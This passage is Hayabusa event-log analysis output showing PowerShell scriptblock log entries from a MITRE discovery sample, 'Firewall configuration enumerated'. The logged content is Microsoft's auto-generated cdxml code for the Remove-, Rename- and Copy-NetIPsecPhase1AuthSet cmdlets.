[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # 
.EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase1AuthSet' function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', Pos",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"itionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] 
[Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParam",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase1AuthSet' function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] 
param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object 